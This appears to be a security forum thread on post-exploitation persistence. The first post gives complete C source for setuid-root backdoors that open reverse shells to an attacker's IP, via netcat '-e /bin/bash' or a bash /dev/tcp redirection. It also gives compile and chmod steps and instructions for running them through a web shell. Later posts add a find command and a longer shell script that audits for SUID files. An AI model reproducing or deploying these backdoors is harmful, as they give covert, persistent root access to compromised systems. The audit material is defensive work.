
Thread: Post Exploitation - Run backdoor with root privileges

  1. #1
    b0nd (b0nd.g4h@gmail.com)
    Join Date: Jul 2010
    Location: irc.freenode.net #g4h
    Posts: 744

    Post Exploitation - Run backdoor with root privileges

    Scenario:

    You managed to slip into the target somehow; it could be by exploiting a network-layer vulnerability or through web vulnerabilities. Let's take the case of web vulnerability exploitation, e.g. SQL injection, and you managed to upload and run a web shell (c99, r57 etc.) there.
    Further assumption: the web server is running as non-root, which is the general case and recommended. You spawn a reverse-connect interactive shell and, running a local privilege escalation exploit, manage to escalate privilege to the root account.
    With root access you can of course do anything: create a new account with root privilege, or escalate the privilege of the web server account so that the reverse connect gives root privilege, etc. But these raise eyebrows and could be detected easily.

    Another, smarter, move could be to make your backdoor always run as root even when executed by a normal user and spawn a root shell: a SUID shell backdoor. This method is recommended when you have constant non-root access to the target.

    Case 1. Execute netcat through the web shell to spawn a reverse-connect interactive shell with root privilege:
    Prerequisites: either nc is already there or you upload one, and you have root access at the moment to run commands.

    Create a 'c' backdoor: backdoor.c
    Code:
    #include <stdio.h>
    #include <stdlib.h>     /* exit() */
    #include <unistd.h>     /* setuid() */

    int main(int argc, char *argv[])
    {
        char cmd[1024];

        /* Both an IP address and a port are used below, so require two arguments */
        if (argc < 3) {
            fprintf(stderr, "Usage: %s <IP> <port>\n", argv[0]);
            exit(1);
        }

        /* The binary is setuid root: make the real uid root as well, so the
           shell started by system() does not drop the effective privilege */
        setuid(0);

        /* Build: /bin/nc <IP> <port> -e /bin/bash
           (adjust the path if netcat lives elsewhere); snprintf keeps an
           overlong argument from overflowing cmd */
        snprintf(cmd, sizeof cmd, "/bin/nc %s %s -e /bin/bash", argv[1], argv[2]);

        system(cmd);
        return 0;
    }
    // Executing: /bin/nc <IP> <Port> -e /bin/bash
    Setuid is an access right flag which can be set on a binary. When it is set, it permits a non-root user to execute it with root privilege.

    Compile with:
    Code:
    root$ gcc -o backdoor backdoor.c
    
    Now set the setuid bit:
    
    root$ chmod 4755 backdoor or root$ chmod a+s backdoor
    Now the execution of the backdoor binary by a non-root user would spawn a netcat reverse connect with root privilege.

    Case 2. Use the "netcat without netcat" technique to spawn a reverse-connect interactive shell with root privilege:
    Prerequisite: /dev/tcp is available to use. Though I am not sure, in a few recent *nix distros it's disabled.

    Compile the following code as we did in Case 1:
    Code:
    #include <stdio.h>
    #include <stdlib.h>     /* exit() */
    #include <unistd.h>     /* setuid(), execl() */

    int main(int argc, char *argv[])
    {
        char cmd[1024];

        if (argc < 3) {
            fprintf(stderr, "Usage: %s <IP> <port>\n", argv[0]);
            exit(1);
        }

        setuid(0);

        /* Build: /bin/bash -i > /dev/tcp/<IP>/<port> 0<&1 2>&1 */
        snprintf(cmd, sizeof cmd,
                 "/bin/bash -i > /dev/tcp/%s/%s 0<&1 2>&1", argv[1], argv[2]);

        /* The /dev/tcp redirection is a bash feature and is performed by the
           shell that parses this command line, so hand it to bash explicitly.
           system() would run it through /bin/sh, which on some distros is
           dash and knows nothing about /dev/tcp. */
        execl("/bin/bash", "bash", "-c", cmd, (char *)NULL);
        perror("execl");
        return 1;
    }
    // Executing: /bin/bash -i > /dev/tcp/10.10.0.1/8080 0<&1 2>&1
    Finally, execute the binary through the web shell:
    Code:
     /absolute or relative path/backdoor [IP Address] [Port]
    The overall dependencies of this method:
    1. PHP shouldn't be hardened to disable all of the following functions, which would prohibit you from executing commands through your web shell:
    Code:
    passthru
    exec
    system
    shell_exec
    Cheers and Happy Hacking!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  2. #2

    Cool

    Nice post, after a long time I've seen you in action, b0nd.
    Well, but whenever I do an audit of a *nix system I always do
    Code:
    find . -type f \( -perm -4000 -o -perm -2000 \) -exec ls {} \; 2>/dev/null
    to find out the suid files in the system ;-)
    Orkut id: neo1981
    Blog: infosec-neo.blogspot.com
    Nothing is Impossible*

    *Conditions Apply
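Added example, not code from either poster: the find one-liner above turned into a small POSIX sh audit that a defender (or a pentester checking their own footprint) can run. It lists setuid/setgid files, flags the ones that sit outside the usual system binary directories, which is exactly where a dropped SUID backdoor like the one in post #1 tends to live, and diffs the current list against a saved baseline. ALLOWED_DIRS is an assumed local policy, not a standard list; adjust it to the box.

```shell
#!/bin/sh
# Added example (not from the thread): audit a tree for setuid/setgid files.
# Assumption: ALLOWED_DIRS is local policy for where such files normally live.

ALLOWED_DIRS="/bin /sbin /usr/bin /usr/sbin /usr/lib /usr/libexec /usr/local/bin /usr/local/sbin"

# Print every regular file under $1 with the setuid or setgid bit set,
# staying on one filesystem (-xdev) and ignoring permission errors.
list_suid_sgid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Succeed if path $1 lies under one of ALLOWED_DIRS.
in_allowed_dir() {
    for d in $ALLOWED_DIRS; do
        case "$1" in "$d"/*) return 0 ;; esac
    done
    return 1
}

# Print one "SUSPECT <ls -ld line>" per setuid/setgid file under $1 that is
# not in an allowed directory. ls -ld shows owner and mode, so a root-owned
# 4755 file in /tmp or under a web root stands out immediately.
audit_suid() {
    list_suid_sgid "$1" | while IFS= read -r f; do
        if ! in_allowed_dir "$f"; then
            printf 'SUSPECT %s\n' "$(ls -ld "$f")"
        fi
    done
}

# Print setuid/setgid files under $2 that are absent from the baseline file
# $1 (one path per line, as saved earlier with: list_suid_sgid / > baseline).
new_since_baseline() {
    cur=$(mktemp) || return 1
    list_suid_sgid "$2" | sort > "$cur"
    sort "$1" | comm -13 - "$cur"
    rm -f "$cur"
}
```

Take the baseline right after the box is built (`list_suid_sgid / | sort > /var/lib/suid.baseline`) and run `new_since_baseline /var/lib/suid.baseline /` from cron; anything it reports, or anything `audit_suid /` prints, is worth checking against the package manager (`dpkg -S` or `rpm -qf`) before deciding it belongs there.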

  3. #3
    b0nd
    Quote Originally Posted by neo View Post
    Nice post, after long time seen your in action bond
    Well but when ever I do audit of *nix system I always do
    Code:
    find . -type f \( -perm -4000 -o -perm -2000 \) -exec ls {} \; 2>/dev/null
    to find out the suid files in the system ;-)
    I shall amend the "overall dependencies" above and mention that the pentester should not be smart enough to look for SUID files.

    btw credit for "netcat without netcat" goes to you for introducing the technique to me earlier. I use that quite often now.
